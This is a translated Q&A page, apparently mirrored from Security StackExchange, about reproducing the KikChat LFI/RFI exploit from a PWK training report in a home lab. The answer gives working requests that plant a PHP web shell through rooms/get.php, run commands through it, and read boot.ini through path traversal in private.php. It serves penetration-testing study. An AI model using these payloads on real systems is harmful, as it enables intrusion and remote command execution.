首页
学习
活动
专区
圈层
工具
发布
社区首页 >问答首页 >KikChat LFI/RFI利用代码?

KikChat LFI/RFI利用代码?
EN

Security用户
提问于 2021-04-07 13:15:05
回答 1查看 168关注 0票数 1

我在第7-14页上读到了关于PWK-Example-Report-v1.pdf的文章,发现在这个例子中使用了KikChat应用程序。

https://www.exploit-db.com/exploits/30235

易受攻击的应用程序的副本可在开发数据库获得。

但是,实际的利用代码/脚本不再存在

我想知道上面的开发代码的内容是什么,因为我想在我的实验室中重现类似的场景。

EN

回答 1

Security用户

回答已采纳

发布于 2021-04-07 13:31:10

在您共享的链接上可以看到:https://www.exploit-db.com/exploits/30235

该漏洞可以通过简单的GET请求直接利用,因此不需要详细的攻击。

在/room/get.php上有一个RCE,您需要复制以下步骤才能创建一个名为shell.php的文件,该文件将是您的will:

  1. 创建名为shell.php的文件。该文件将执行分配给"cmd“GET变量的命令:

http://127.0.0.1/KikChat/rooms/get.php?name=shell.php&ROOM=<?php system($_GET['cmd']); ?>

  1. 使用"cmd“get变量访问文件并获取命令执行:

http://127.0.0.1/KikChat/myroom/shell.php?cmd=whoami;

名称参数上的/KikChat/private.php页面上也有一个LFI:

代码语言:javascript
复制
http://127.0.0.1/KikChat/private.php?name=../../../../../../../../../../boot.ini
票数 2
EN
页面原文内容由Security提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:

https://security.stackexchange.com/questions/248040

复制
相关文章

相似问题

领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档